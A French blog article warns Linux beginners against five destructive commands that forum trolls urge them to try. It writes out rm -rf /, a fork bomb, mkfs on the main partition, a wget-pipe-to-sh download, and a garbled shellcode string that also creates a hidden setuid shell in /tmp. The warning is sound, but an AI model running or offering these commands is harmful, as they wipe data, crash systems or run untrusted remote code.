Les 5 commandes Linux à éviter en mode console

19
0

Les commandes Linux sont pratiquement les mêmes que sous Unix avec l’existence de quelques variantes pour les options, il existe des commandes de base mais aussi d’autres pour les experts une fois exécutées sur une console ,impossible de revenir en arrière !

On trouve souvent ce genre de commandes dans les forums ou les membres trollent les gens qui demandent de l’aide en les incitant à essayer des lignes de commandes pour corriger, résoudre un problème système ou juste tester pour voir ce que ça donne sous Linux. 

Si vous ne connaissez pas assez l’environnement Linux, évitez de taper tous ce que les gens vous disent  car vous pouvez détruire tout le système par une simple commande sans une demande de confirmation ni alerte par Linux surtout si vous êtes en mode root (administrateur système).

J’ai regroupé donc une sélection de commandes Linux pour éviter la catastrophe et attention à ne pas tester 

1- rm -rf /

La commande rm -rf / efface tous les fichiers et répertoires possibles incluant les fichiers sur le disque dur et les fichiers des autres média connectés ( disque dure externe, flash usb ..etc.)

La commande en détails :
      rm : Remove (effacer le fichier / les fichiers )
     -rf  :(r) Effacer les fichiers et répertoires  d’une manière récursive et forcer (f) l’exécution pour éviter les messages de conformation.
       /    :  indique que la suppression commence de la racine.

Linux sera très heureux d’exécuter cette commande 

2- rm –rf / en mode déguisé

Il s’agit de la version hex de la commande  rm -rf / en mode déguisé : 

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

La leçon : ne jamais taper du charabia sur la console !

3- :(){ :|: & };:   

Taper ces caractères sous linux, le shell se créera en multiple copies à l’infinie jusqu’à saturer la table des processus et va rapidement faire planter le système. 

La commande :(){ :|: & };: est belle bien une fonction shell ! une bombe logique ou en anglais Fork bomb sous bach Linux

4- mkfs.ext4 /dev/sda1

Cette commande est l’équivalente à Format C: sur le MSDOS de windows, elle supprime les fichiers sur la partition principale et remplace cette dernière par un nouveau système de fichiers.

5- wget http://lagrottedugeek.com/script.sh - O -  | sh

Cette ligne de commande télécharge un fichier distant grâce a la commande wget puis elle l’envoi au shell pour exécuter son contenu directement après la fin du téléchargement. vous avez compris le reste d’où vient sa dangerosité.

LAISSER UN COMMENTAIRE

Please enter your comment!
Please enter your name here